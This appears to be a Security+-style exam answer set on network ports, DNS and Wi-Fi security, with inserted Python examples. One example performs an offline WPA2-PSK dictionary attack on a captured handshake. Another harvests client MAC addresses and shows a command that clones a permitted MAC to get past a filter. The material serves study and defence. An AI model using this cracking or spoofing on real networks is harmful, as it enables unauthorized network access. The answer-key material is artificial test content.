Answer: C,DExplanation: A PPTP tunnel is instantiated by communication to the peer on TCP port 1723. This TCP connection is then used to initiate and manage a second GRE tunnel to the same peer. The PPTP GRE packet format is non-standard, including an additional acknowledgement field replacing the typical routing field in the GRE header. However, as in a normal GRE connection, those modified GRE packets are directly encapsulated into IP packets, and seen as IP protocol number 47. Note that GRE is therefore an IP protocol number, not a UDP or TCP port, whatever option D calls it: a firewall that permits only TCP 1723 will complete the control connection and then pass no tunnel traffic until IP protocol 47 is also allowed.

After a new firewall has been installed, devices cannot obtain a new IP address. Which of thefollowing ports should Matt, the security administrator, open on the firewall?A. 25B. 68C. 80D. 443

Answer: BExplanation: The Dynamic Host Configuration Protocol (DHCP) is a standardized network protocol used on Internet Protocol (IP) networks for distributing IP addresses to interfaces and services. DHCP runs over UDP: the server listens on port 67 and the client on port 68, so in practice both have to be permitted; of the options listed only 68 belongs to DHCP (25 is SMTP, 80 HTTP, 443 HTTPS).

A security administrator has configured FTP in passive mode. Which of the following ports shouldthe security administrator allow on the firewall by default?A. 20B. 21C. 22D. 23

Answer: BExplanation: When establishing an FTP session, clients start a control connection to an FTP server that listens on TCP port 21 by default. In passive mode the client then also opens the data connection, to a server-chosen high port announced in the PASV reply; port 20 is only used as the source port when the server opens the data connection in active mode. So the firewall must allow 21 and, unless it inspects FTP and tracks the announced port, the server's configured passive port range as well.

Which of the following ports is used for SSH, by default?A. 23B. 32C. 12D. 22

Answer: DExplanation: Secure Shell (SSH) is a cryptographic network protocol for securing data communication. Itestablishes a secure channel over an insecure network in a client-server architecture, connectingan SSH client application with an SSH server. Common applications include remote command-linelogin, remote command execution, but any network service can be secured with SSH. SSH usesport 22.

By default, which of the following uses TCP port 22? (Select THREE).A. FTPSB. STELNETC. TLSD. SCPE. SSLF. HTTPSG. SSHH. SFTP

Answer: D,G,HExplanation: G: Secure Shell (SSH) is a cryptographic network protocol for securing data communication. Itestablishes a secure channel over an insecure network in a client-server architecture, connectingan SSH client application with an SSH server. Common applications include remote command-linelogin, remote command execution, but any network service can be secured with SSH. SSH usesport 22.D: SCP stands for Secure Copy. SCP is used to securely copy files over a network. SCP usesSSH to secure the connection and therefore uses port 22.H: SFTP stands for stands for Secure File Transfer Protocol and is used for transferring files usingFTP over a secure network connection. SFTP uses SSH to secure the connection and thereforeuses port 22.

Pete needs to open ports on the firewall to allow for secure transmission of files. Which of thefollowing ports should be opened on the firewall?A. TCP 23B. UDP 69C. TCP 22D. TCP 21

Answer: CExplanation: SSH uses TCP port 22, and all services tunneled over SSH, including SFTP, SCP and slogin, use the same port. Secure Copy Protocol (SCP) is a secure file-transfer facility based on SSH and Remote Copy Protocol (RCP). Secure FTP (SFTP) is a secured alternative to standard File Transfer Protocol (FTP). TCP 23 is Telnet, UDP 69 is TFTP and TCP 21 is plain FTP, none of which encrypt.

Which of the following uses port 22 by default? (Select THREE).A. SSHB. SSLC. TLSD. SFTPE. SCPF. FTPSG. SMTPH. SNMP

Answer: A,D,EExplanation: SSH uses TCP port 22, and all services tunneled over SSH, including SFTP, SCP and slogin, use the same port. SSL/TLS have no port of their own (they take the port of the protocol they wrap, such as 443 for HTTPS), FTPS uses 21 or 990, SMTP uses 25 and SNMP uses UDP 161/162.

Which of the following ports should be used by a system administrator to securely manage aremote server?A. 22B. 69C. 137D. 445

Answer: AExplanation: Secure Shell (SSH) is a more secure replacement for Telnet, rlogon, rsh, and rcp. SSH can becalled a remote access or remote terminal solution. SSH offers a means by which a commandline, text-only interface connection with a server, router, switch, or similar device can beestablished over any distance. SSH makes use of TCP port 22.

Which of the following ports is used to securely transfer files between remote UNIX systems?A. 21B. 22C. 69D. 445

Answer: BExplanation: SCP copies files securely between hosts on a network. It uses SSH for data transfer, and uses the same authentication and provides the same security as SSH. Unlike RCP, SCP will ask for passwords or passphrases if they are needed for authentication. SSH uses TCP port 22, and all services tunneled over SSH, including SFTP, SCP and slogin, use the same port.

Which of the following secure file transfer methods uses port 22 by default?A. FTPSB. SFTPC. SSLD. S/MIME

Answer: BExplanation: SSH uses TCP port 22, and all services tunneled over SSH, including SFTP, SCP and slogin, use the same port. FTPS, by contrast, is FTP over TLS on port 21 (explicit) or 990 (implicit), and S/MIME is a message format, not a transfer protocol.

During the analysis of a PCAP file, a security analyst noticed several communications with a remote server on port 53. Which of the following protocol types is observed in this traffic?A. FTPB. DNSC. EmailD. NetBIOS

Answer: BExplanation: DNS (Domain Name System) uses port 53, over UDP for most queries and over TCP for zone transfers and large responses.

A security technician needs to open ports on a firewall to allow for domain name resolution. Which of the following ports should be opened? (Select TWO).A. TCP 21 B. TCP 23 C. TCP 53 D. UDP 23 E. UDP 53

Answer: C,EExplanation: DNS uses both TCP and UDP port 53. UDP port 53 carries ordinary queries; TCP port 53 is used for zone transfers and also whenever a response is too large for a single UDP datagram (the server sets the truncated bit and the client retries over TCP, which is common with DNSSEC and large TXT or AAAA answers). Blocking TCP 53 therefore breaks more than zone transfers, and RFC 7766 requires DNS implementations to support TCP.
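Added example, not part of the original cards, that ties together the AAAA record, zone transfer and port 53 questions above: a Python script that builds a wire-format DNS query (the AAAA request for www.comptia.com from the log question), parses it back, shows the 2-byte length framing that distinguishes DNS over TCP from DNS over UDP, and applies a simple detection rule that flags an AXFR request arriving from a host that is not a known secondary. The query name, transaction IDs and the set of secondary addresses are constructed for the example; the record-type numbers and header layout are from the DNS standard.

```python
import struct

# Record types used in the questions above, plus the zone-transfer type.
QTYPE = {"A": 1, "NS": 2, "CNAME": 5, "SOA": 6, "PTR": 12, "MX": 15,
         "TXT": 16, "AAAA": 28, "AXFR": 252, "ANY": 255}
QTYPE_NAME = {v: k for k, v in QTYPE.items()}


def encode_name(name):
    """'www.comptia.com' -> b'\\x03www\\x07comptia\\x03com\\x00' (length-prefixed labels)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_query(name, qtype, txid):
    """A standard query: 12-byte header (flags 0x0100 = RD set, QDCOUNT=1) plus one question."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    question = encode_name(name) + struct.pack(">HH", QTYPE[qtype], 1)   # class IN
    return header + question


def tcp_stream(msg):
    """Over TCP 53 every message is prefixed with a 2-byte big-endian length; that
    framing is what lets a zone transfer (or a >512-byte answer) ride one stream.
    Over UDP 53 the datagram payload is the bare message."""
    return struct.pack(">H", len(msg)) + msg


def parse_tcp_stream(data):
    """Split a TCP byte stream into the DNS messages it carries."""
    msgs, off = [], 0
    while off + 2 <= len(data):
        (length,) = struct.unpack(">H", data[off:off + 2])
        msgs.append(data[off + 2:off + 2 + length])
        off += 2 + length
    return msgs


def parse_message(msg):
    """Decode the header and the first question of a wire-format DNS message."""
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", msg[:12])
    off, labels = 12, []
    while True:
        n = msg[off]
        off += 1
        if n == 0:
            break
        if n & 0xC0:   # compression pointer; not expected inside a question name
            raise ValueError("compressed name in question section")
        labels.append(msg[off:off + n].decode("ascii"))
        off += n
    qtype, qclass = struct.unpack(">HH", msg[off:off + 4])
    return {"id": txid, "is_response": bool(flags & 0x8000), "rd": bool(flags & 0x0100),
            "name": ".".join(labels), "qtype": QTYPE_NAME.get(qtype, qtype),
            "qclass": qclass, "qdcount": qd, "ancount": an}


def flag_axfr(msg, transport, secondaries, src):
    """Detection rule: an AXFR request that does not come from a known secondary
    is the zone-enumeration attempt the cards above describe. A real AXFR always
    runs over TCP, so an AXFR over UDP is itself suspicious."""
    q = parse_message(msg)
    if q["qtype"] != "AXFR" or q["is_response"]:
        return None
    if transport != "tcp":
        return f"AXFR over {transport} from {src}: malformed request or a scan"
    if src not in secondaries:
        return f"AXFR from unknown host {src}: possible zone enumeration"
    return None


if __name__ == "__main__":
    q = build_query("www.comptia.com", "AAAA", 0x1234)
    print(parse_message(q))
    print(tcp_stream(q)[:2].hex(), "= length prefix for TCP")
    # Constructed secondary list and source addresses for the detection rule.
    print(flag_axfr(build_query("comptia.com", "AXFR", 7), "tcp", {"192.0.2.2"}, "203.0.113.9"))
```

Such a rule belongs on the authoritative server's logs or an IDS watching TCP 53; the transfer ACL on the server is the control, and the detection tells you when someone is probing it.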

A technician has just installed a new firewall onto the network. Users are reporting that theycannot reach any website. Upon further investigation, the technician determines that websites canbe reached by entering their IP addresses. Which of the following ports may have been closed tocause this issue?A. HTTPB. DHCPC. DNSD. NetBIOS

Answer: CExplanation: DNS links IP addresses and human-friendly fully qualified domain names (FQDNs), which aremade up of the Top-level domain (TLD), the registered domain name, and the Subdomain orhostname.Therefore, if the DNS ports are blocked websites will not be reachable.

Which of the following ports would be blocked if Pete, a security administrator, wants to denyaccess to websites?A. 21B. 25C. 80D. 3389

Answer: CExplanation: Port 80 is used by HTTP, which is the foundation of data communication for the World Wide Web.

A technician is unable to manage a remote server. Which of the following ports should be openedon the firewall for remote server management? (Select TWO).A. 22B. 135C. 137D. 143E. 443F. 3389

Answer: A,FExplanation: A secure remote administration solution and Remote Desktop protocol is required.Secure Shell (SSH) is a secure remote administration solution and makes use of TCP port 22.Remote Desktop Protocol (RDP) uses TCP port 3389.

Ann, a technician, is attempting to establish a remote terminal session to an end user’s computerusing Kerberos authentication, but she cannot connect to the destination machine. Which of thefollowing default ports should Ann ensure is open?A. 22B. 139 C. 443D. 3389

Answer: DExplanation: Remote Desktop Protocol (RDP) uses TCP port 3389.

Which of the following protocols operates at the HIGHEST level of the OSI model?A. ICMPB. IPSecC. SCPD. TCP

Answer: CExplanation: SCP (Secure Copy) uses SSH (Secure Shell). SSH runs in the application layer (layer 7) of theOSI model.

Which of the following allows Pete, a security technician, to provide the MOST secure wirelessimplementation?A. Implement WPAB. Disable SSIDC. Adjust antenna placementD. Implement WEP

Answer: AExplanation: Of the options supplied, WiFi Protected Access (WPA) is the most secure and is thereplacement for WEP

A malicious user is sniffing a busy encrypted wireless network waiting for an authorized client to connect to it. Only after an authorized client has connected and the hacker was able to capture theclient handshake with the AP can the hacker begin a brute force attack to discover the encryptionkey. Which of the following attacks is taking place?A. IV attackB. WEP crackingC. WPA crackingD. Rogue AP

Answer: CExplanation: WPA/WPA2-Personal derives the session keys from the pre-shared passphrase, the SSID, the two MAC addresses and the two nonces exchanged in the 4-way handshake. Everything except the passphrase is sent in clear, and the handshake's MIC lets the attacker verify a guess, so once the handshake is captured the passphrase can be brute-forced offline with no further contact with the network. There are three steps to penetrating a WPA-protected network:
1. Sniffing: capture the 4-way handshake as an authorized client connects (or force one by deauthenticating a client).
2. Parsing: extract the SSID, MAC addresses, nonces and MIC from the capture.
3. Attacking: run a dictionary or brute-force attack against the captured handshake offline.
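Added example, not from the original cards: a self-contained Python model of the offline attack just described, using the actual WPA2-Personal key derivation (PMK = PBKDF2-HMAC-SHA1 over the passphrase salted with the SSID, PTK from the 802.11i PRF-512 over the MACs and nonces, Key MIC = truncated HMAC-SHA1 under KCK). The "capture" is constructed in the script by having a simulated client produce handshake message 2 for a passphrase of our choosing; the SSID, MAC addresses, nonces and wordlist are all made up. The recovery function then sees only what an attacker would: the SSID, both MACs, the ANonce and the client's message 2 with its MIC. It also explains why WPA2-Enterprise (next card) does not have this weakness: there the PMK comes out of the EAP exchange per session and is never a password.

```python
import hashlib
import hmac

MIC_OFF = 81   # offset of the 16-byte Key MIC inside the EAPOL-Key frame built below


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, so precomputed tables only work for one network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """IEEE 802.11i PRF-512: the PTK depends on the PMK plus the two MAC
    addresses and the two nonces, all of which cross the air in clear."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac) +
            min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):   # 4 x 20 bytes of SHA-1 output >= 64 bytes
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def key_mic(kck, eapol_frame):
    """WPA2 (CCMP) Key MIC: HMAC-SHA1 over the frame with the MIC field zeroed, cut to 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_msg2(snonce):
    """Constructed EAPOL-Key message 2 (client -> AP) with the MIC field zeroed:
    EAPOL header (version 2, type 3 Key, length) + RSN key descriptor carrying SNonce."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + b"\x00" * 8 + snonce +
            b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def supplicant_msg2(passphrase, ssid, ap_mac, sta_mac, anonce, snonce):
    """What the legitimate client transmits: message 2 authenticated with KCK = PTK[0:16]."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    frame = build_msg2(snonce)
    return frame[:MIC_OFF] + key_mic(kck, frame) + frame[MIC_OFF + 16:]


def recover_passphrase(ssid, ap_mac, sta_mac, anonce, msg2, wordlist):
    """The attacker's side: every input except the passphrase was captured in
    clear, so each candidate can be checked offline against the observed MIC."""
    snonce = msg2[17:49]
    observed = msg2[MIC_OFF:MIC_OFF + 16]
    zeroed = msg2[:MIC_OFF] + b"\x00" * 16 + msg2[MIC_OFF + 16:]
    for cand in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(key_mic(kck, zeroed), observed):
            return cand
    return None


# Constructed handshake parameters (not a real capture).
SSID = "CorpWiFi"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
CAPTURED_MSG2 = supplicant_msg2("Summer2015!", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)
WORDLIST = ["letmein", "hunter2", "Summer2015!", "Password1"]

if __name__ == "__main__":
    print("recovered:", recover_passphrase(SSID, AP_MAC, STA_MAC, ANONCE, CAPTURED_MSG2, WORDLIST))
```

The cost per guess is one PBKDF2 run of 4096 SHA-1 rounds, which is why a long random passphrase defeats this and a dictionary word does not; the network itself never sees the guesses, so rate limiting on the AP is no defence.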

Which of the following is a step in deploying a WPA2-Enterprise wireless network?A. Install a token on the authentication serverB. Install a DHCP server on the authentication serverC. Install an encryption key on the authentication serverD. Install a digital certificate on the authentication server

Answer: DExplanation: When setting up a wireless network you will find two very different modes of Wi-Fi Protected Access (WPA) security, which apply to both the WPA and WPA2 versions.
The easiest to set up is the Personal mode, technically called the Pre-Shared Key (PSK) mode. It doesn't require anything beyond the wireless router or access points (APs) and uses a single passphrase or password for all users/devices.
The other is the Enterprise mode, which should be used by businesses and organizations, and is also known as the RADIUS, 802.1X, 802.11i, or EAP mode. It provides better security and key management, and supports other enterprise-type functionality such as VLANs and NAP. However, it requires an external authentication server, called a Remote Authentication Dial In User Service (RADIUS) server, to handle the 802.1X authentication of users.
The basic steps for setting up WPA/WPA2-Enterprise and 802.1X are:
1. Choose, install, and configure a RADIUS server, or use a hosted service.
2. Create a certificate authority (CA) so you can issue and install a digital certificate onto the RADIUS server; this may be done as part of the RADIUS server installation and configuration. Alternatively, purchase a digital certificate from a public CA, such as GoDaddy or Verisign, so you don't have to install the server certificate on all the clients. If using EAP-TLS, also create digital certificates for each end user.
3. On the server, populate the RADIUS client database with the IP address and shared secret for each AP.
4. On the server, populate user data with usernames and passwords for each end user.
5. On each AP, configure the security for WPA/WPA2-Enterprise and input the RADIUS server IP address and the shared secret you created for that particular AP.
6. On each Wi-Fi computer and device, configure the security for WPA/WPA2-Enterprise and set the 802.1X authentication settings.

A security administrator must implement a wireless security system, which will require users toenter a 30 character ASCII password on their accounts. Additionally the system must support 3DSwireless encryption.Which of the following should be implemented?A. WPA2-CCMP with 802.1XB. WPA2-PSKC. WPA2-CCMPD. WPA2-Enterprise

Answer: DExplanation: D: WPA-Enterprise is also referred to as WPA-802.1X mode, and sometimes just WPA (asopposed to WPA-PSK), this is designed for enterprise networks and requires a RADIUSauthentication server. This requires a more complicated setup, but provides additional security(e.g. protection against dictionary attacks on short passwords). Various kinds of the ExtensibleAuthentication Protocol (EAP) are used for authentication. RADIUS can be managed centrally,and the servers that allow access to a network can verify with a RADIUS server whether anincoming caller is authorized. Thus the RADIUS server can perform all authentications. This willrequire users to use their passwords on their user accounts.

Configuring key/value pairs on a RADIUS server is associated with deploying which of thefollowing?A. WPA2-Enterprise wireless networkB. DNS secondary zonesC. Digital certificatesD. Intrusion detection system

Answer: AExplanation: WPA2-Enterprise is designed for enterprise networks and requires a RADIUS authenticationserver.

A security administrator must implement a network authentication solution which will ensure encryption of user credentials when users enter their username and password to authenticate to the network. Which of the following should the administrator implement?A. WPA2 over EAP-TTLS B. WPA-PSK C. WPA2 with WPS D. WEP over EAP-PEAP

Answer: DExplanation: Wired Equivalent Privacy (WEP) is designed to provide security equivalent to that of a wired network. WEP has vulnerabilities and isn't considered highly secure. Extensible Authentication Protocol (EAP) provides a framework for authentication that is often used with wireless networks. Among the EAP types used with WPA/WPA2-Enterprise are EAP-TLS, EAP-TTLS and PEAP; LEAP and EAP-MD5 also exist but are no longer considered secure.
PEAP is similar in design to EAP-TTLS, requiring only a server-side PKI certificate to create a secure TLS tunnel to protect user authentication, and uses server-side public key certificates to authenticate the server. It then creates an encrypted TLS tunnel between the client and the authentication server. In most configurations the keys for this encryption are transported using the server's public key. The ensuing exchange of authentication information inside the tunnel to authenticate the client is then encrypted, and user credentials are safe from eavesdropping.
Note that the credential protection here comes entirely from the PEAP TLS tunnel, not from WEP: WEP's RC4 keying is broken, so in a real deployment the tunnel would be carried over WPA2, and the client must be configured to validate the server certificate, otherwise a rogue AP can terminate the tunnel itself and capture the inner credential exchange.

Which of the following BEST describes the weakness in WEP encryption?A. The initialization vector of WEP uses a crack-able RC4 encryption algorithm. Once enough packets are captured an XOR operation can be performed and the asymmetric keyscan be derived.B. The WEP key is stored in plain text and split in portions across 224 packets of random data.Once enough packets are sniffed the IV portion of the packets can be removed leaving the plaintext key.C. The WEP key has a weak MD4 hashing algorithm used.A simple rainbow table can be used to generate key possibilities due to MD4 collisions.D. The WEP key is stored with a very small pool of random numbers to make the cipher text.As the random numbers are often reused it becomes easy to derive the remaining WEP key.

Answer: DExplanation: WEP is based on RC4, but due to errors in design and implementation WEP is weak in a number of areas, two of which are the use of a static shared key and a poor implementation of initialization vectors (IVs). The IV is only 24 bits and is sent in clear, so on a busy network IVs repeat within hours; because the RC4 keystream for a given IV and key is always the same, packets with repeated IVs leak keystream and ultimately the static key itself. When the WEP key is discovered, the attacker can join the network and then listen in on all other wireless client communications.

Which of the following would satisfy wireless network implementation requirements to use mutualauthentication and usernames and passwords?A. EAP-MD5B. WEPC. PEAP-MSCHAPv2D. EAP-TLS

Answer: CExplanation: PEAP-MS-CHAP v2 is easier to deploy than EAP-TLS or PEAP-TLS because user authentication is accomplished via password-based credentials (user name and password) rather than digital certificates or smart cards, and the authentication is mutual: the client validates the server's certificate when the TLS tunnel is set up, and the server validates the user's MS-CHAPv2 response inside the tunnel.

Matt, a systems security engineer, is determining which credential-type authentication to use within a planned 802.1X deployment. He is looking for a method that does not require a client certificate, has a server-side certificate, and uses TLS tunnels for encryption. Which credential-type authentication method BEST fits these requirements?
A. EAP-TLS
B. EAP-FAST
C. PEAP-CHAP
D. PEAP-MSCHAPv2

Answer: D
Explanation: PEAP-MSCHAPv2 is easier to deploy than EAP-TLS or PEAP-TLS because user authentication is accomplished via password-based credentials (user name and password) rather than digital certificates or smart cards. Only the authentication server (for example, a server running Network Policy Server (NPS)) is required to have a certificate; the clients need none. EAP-TLS needs a client certificate, and EAP-FAST builds its tunnel from a Protected Access Credential (PAC) instead of relying on a server certificate.

Which of the following means of wireless authentication is easily vulnerable to spoofing?
A. MAC filtering
B. WPA-LEAP
C. WPA-PEAP
D. Enabled SSID

Answer: A
Explanation: Each network interface on your computer or any other networked device has a unique MAC address. These MAC addresses are assigned in the factory, but you can easily change, or "spoof", a MAC address in software. Networks can use MAC address filtering to allow only devices with specific MAC addresses to connect. This isn't a strong security control: the source MAC address of every frame is transmitted in the clear, even on an encrypted WLAN, so an attacker can capture an allowed address and clone it.

Ann, a sales manager, successfully connected her company-issued smartphone to the wireless network in her office without supplying a username/password combination. Upon disconnecting from the wireless network, she attempted to connect her personal tablet computer to the same wireless network and could not connect. Which of the following is MOST likely the reason?
A. The company wireless is using a MAC filter.
B. The company wireless has SSID broadcast disabled.
C. The company wireless is using WEP.
D. The company wireless is using WPA2.

Answer: A
Explanation: MAC filtering allows you to include or exclude computers and devices based on their MAC address; the company-issued smartphone's address is on the allow list and the personal tablet's is not.

After entering the following information into a SOHO wireless router, a mobile device's user reports being unable to connect to the network:
PERMIT 0A:D1:FA:B1:03:37
DENY 01:33:7F:AB:10:AB
Which of the following is preventing the device from connecting?
A. WPA2-PSK requires a supplicant on the mobile device.
B. Hardware address filtering is blocking the device.
C. TCP/IP port filtering has been implemented on the SOHO router.
D. IP address filtering has disabled the device from connecting.

Answer: B
Explanation: The entries are MAC (hardware) addresses, so this is MAC filtering, which allows you to include or exclude computers and devices based on their MAC address. The mobile device's address is either the one on the DENY line or absent from the PERMIT list, and in both cases the router refuses the association.
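How a hardware-address filter like the one on this card is evaluated, and why the previous card calls it easily spoofable, as an added example that is not part of the original card set. The rule text reuses the two addresses from the question; the frame capture, the AP BSSID and the comment line are constructed.

```python
"""MAC filtering as a SOHO router applies it, and why a cloned address passes (added example, not from the page)."""
import re

# The two rule lines from the card plus a comment, as a router might store them (constructed text).
SOHO_RULES = """
# hardware-address filter, first match wins
PERMIT 0A:D1:FA:B1:03:37
DENY 01:33:7F:AB:10:AB
"""

# Constructed capture of 802.11 frame headers on the same WLAN. Even with WPA2 the addresses are cleartext.
AP_BSSID = "C0:FF:EE:00:00:01"
CAPTURE = [
    {"src": "0A:D1:FA:B1:03:37", "dst": "C0:FF:EE:00:00:01"},   # permitted client to AP
    {"src": "C0:FF:EE:00:00:01", "dst": "0A:D1:FA:B1:03:37"},   # AP back to client
    {"src": "C0:FF:EE:00:00:01", "dst": "FF:FF:FF:FF:FF:FF"},   # beacon
]


def normalize_mac(raw: str) -> str:
    """Reduce any common spelling (colons, dashes, dots, stray spaces, mixed case) to AA:BB:CC:DD:EE:FF."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", raw)
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {raw!r}")
    digits = digits.upper()
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def parse_rules(text: str):
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        action, _, mac = line.partition(" ")
        action = action.upper()
        if action not in ("PERMIT", "DENY"):
            raise ValueError(f"bad rule: {line!r}")
        rules.append((action, normalize_mac(mac)))
    return rules


def is_allowed(rules, client_mac: str, default: str = "DENY") -> bool:
    """First matching entry wins; an address on neither list gets the router's default (deny here)."""
    mac = normalize_mac(client_mac)
    for action, rule_mac in rules:
        if rule_mac == mac:
            return action == "PERMIT"
    return default == "PERMIT"


def is_unicast(mac: str) -> bool:
    """Individual/group bit: a set LSB in the first octet marks a multicast or broadcast address."""
    return int(mac[:2], 16) & 1 == 0


def harvest_client_macs(frames, bssid: str):
    """What an attacker gets from a passive capture: every unicast address on the WLAN that is not the AP."""
    bssid = normalize_mac(bssid)
    clients = set()
    for frame in frames:
        for addr in (normalize_mac(frame["src"]), normalize_mac(frame["dst"])):
            if addr != bssid and is_unicast(addr):
                clients.add(addr)
    return clients
```

Once `harvest_client_macs` has yielded a permitted address, a Linux client sets it with `ip link set dev wlan0 address 0a:d1:fa:b1:03:37` (interface down) and `is_allowed` returns True for that client. Incidentally, the DENY entry on the card has the group bit set, so `is_unicast` reports it as a multicast address that no interface would carry as its burned-in address.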

A security analyst has been tasked with securing a guest wireless network. They recommend thecompany use an authentication server but are told the funds are not available to set this up.


Which of the following BEST allows the analyst to restrict user access to approved devices?



A. Antenna placement


B. Power level adjustment


C. Disable SSID broadcasting


D. MAC filtering

Answer: D


Explanation: A MAC filter is a list of authorized wireless client interface MAC addresses that is used by a WAP to block access to all unauthorized devices.

If you don't know the MAC address of a Linux-based machine, what command-line utility can you use to ascertain it?
A. macconfig
B. ifconfig
C. ipconfig
D. config

Answer: B
Explanation: To find the MAC address of a Unix/Linux workstation, use ifconfig or, on current Linux distributions where ifconfig is no longer installed by default, ip link (ip a). ipconfig is the Windows equivalent.

An organization does not want the wireless network name to be easily discovered. Which of the following software features should be configured on the access points?
A. SSID broadcast
B. MAC filter
C. WPA2
D. Antenna placement

Answer: A
Explanation: Numerous networks broadcast their name (known as an SSID broadcast) in beacon frames to reveal their presence; disabling SSID broadcast on the access points hides the name from casual discovery.

A security architect wishes to implement a wireless network with connectivity to the company's internal network. Before they inform all employees that this network is being put in place, the architect wants to roll it out to a small test segment. Which of the following allows for greater secrecy about this network during this initial phase of implementation?
A. Disabling SSID broadcasting
B. Implementing WPA2-TKIP
C. Implementing WPA2-CCMP
D. Filtering test workstations by MAC address

Answer: A
Explanation: Network administrators may choose to disable SSID broadcast to hide their network from unauthorized personnel. However, the SSID is still needed to direct packets to and from the base station, so it is a discoverable value using a wireless packet sniffer. Disabling SSID broadcast therefore provides obscurity rather than security, but it is a reasonable setting for a network that isn't intended for public use.

While previously recommended as a security measure, disabling SSID broadcast is not effective against most attackers because network SSIDs are:
A. no longer used to authenticate to most wireless networks.
B. contained in certain wireless packets in plaintext.
C. contained in all wireless broadcast packets by default.
D. no longer supported in 802.11 protocols.

Answer: B
Explanation: The SSID is still required for directing packets to and from the base station, and it is carried in plaintext in probe requests, probe responses and association requests, so it can be discovered using a wireless packet sniffer.

A company provides secure wireless Internet access for visitors and vendors working onsite. Some of the vendors using older technology report that they are unable to access the wireless network after entering the correct network information. Which of the following is the MOST likely reason for this issue?
A. The SSID broadcast is disabled.
B. The company is using the wrong antenna type.
C. The MAC filtering is disabled on the access point.
D. The company is not using strong enough encryption.

Answer: A
Explanation: When the SSID is broadcast, any device with an automatic detect-and-connect feature is able to see the network and can initiate a connection with it. Some older clients cannot join a network whose SSID is hidden even when the correct name and key are entered manually, so the fact that they cannot access the network indicates that they are unable to see it.

Which of the following best practices makes a wireless network more difficult to find?
A. Implement MAC filtering
B. Use WPA2-PSK
C. Disable SSID broadcast
D. Power down unused WAPs

Answer: C
Explanation: Network administrators may choose to disable SSID broadcast to hide their network from unauthorized personnel. However, the SSID is still needed to direct packets to and from the base station, so it is a discoverable value using a wireless packet sniffer. Disabling SSID broadcast is therefore appropriate for a network that isn't for public use, but it is not a substitute for encryption.

Jane, the security administrator, sets up a new AP but realizes too many outsiders are able to connect to that AP and gain unauthorized access. Which of the following would be the BEST way to mitigate this issue and still provide coverage where needed? (Select TWO).
A. Disable the wired ports
B. Use channels 1, 4 and 7 only
C. Enable MAC filtering
D. Disable SSID broadcast
E. Switch from 802.11a to 802.11b

Answer: C, D
Explanation: Network administrators may choose to disable SSID broadcast to hide their network from unauthorized personnel. However, the SSID is still needed to direct packets to and from the base station, so it is a discoverable value using a wireless packet sniffer. A MAC filter is a list of authorized wireless client interface MAC addresses that is used by a WAP to block access to all unauthorized devices. Neither option reduces the coverage area, which is why they are preferred here over reducing power.

Which of the following wireless security technologies continuously supplies new keys for WEP?
A. TKIP
B. MAC filtering
C. WPA2
D. WPA

Answer: A
Explanation: TKIP (Temporal Key Integrity Protocol) is a suite of algorithms that works as a "wrapper" around WEP, which allows users of legacy WLAN equipment to upgrade to TKIP without replacing hardware. TKIP keeps the underlying RC4 cipher but adds a per-packet key-mixing function, a 48-bit sequence counter that replaces WEP's 24-bit IV and defeats replay, and a message integrity check (Michael), so that every frame is encrypted with a different key.

A network administrator has been tasked with securing the WLAN. Which of the following cryptographic products would be used to provide the MOST secure environment for the WLAN?
A. WPA2 CCMP
B. WPA
C. WPA with MAC filtering
D. WPA2 TKIP

Answer: A
Explanation: CCMP is the standard encryption protocol for use with the WPA2 standard and is much more secure than the WEP protocol and the TKIP protocol of WPA. CCMP provides the following security services:
Data confidentiality: ensures only authorized parties can access the information.
Authentication: provides proof of the genuineness of the sender (data origin authentication).
Access control in conjunction with layer management.
Because CCMP is a block cipher mode using a 128-bit key, it is secure against attacks requiring up to 2^64 steps of operation.

An access point has been configured for AES encryption but a client is unable to connect to it. Which of the following should be configured on the client to fix this issue?
A. WEP
B. CCMP
C. TKIP
D. RC4

Answer: B
Explanation: CCMP is an encryption protocol designed for wireless LAN products that implement the standards of the IEEE 802.11i amendment to the original IEEE 802.11 standard. CCMP is an enhanced data cryptographic encapsulation mechanism designed for data confidentiality and based upon the Counter Mode with CBC-MAC (CCM) mode of the AES standard. "AES" in an access point's settings means CCMP, so the client must be set to WPA2/AES (CCMP) rather than TKIP.

A security administrator wishes to increase the security of the wireless network. Which of the following BEST addresses this concern?
A. Change the encryption from TKIP-based to CCMP-based.
B. Set all nearby access points to operate on the same channel.
C. Configure the access point to use WEP instead of WPA2.
D. Enable all access points to broadcast their SSIDs.

Answer: A
Explanation: CCMP makes use of 128-bit AES encryption with a 48-bit packet number that serves as the nonce, whereas TKIP and WEP rely on RC4. The large, never-repeating packet number removes the keystream-reuse and replay weaknesses of the RC4-based protocols.

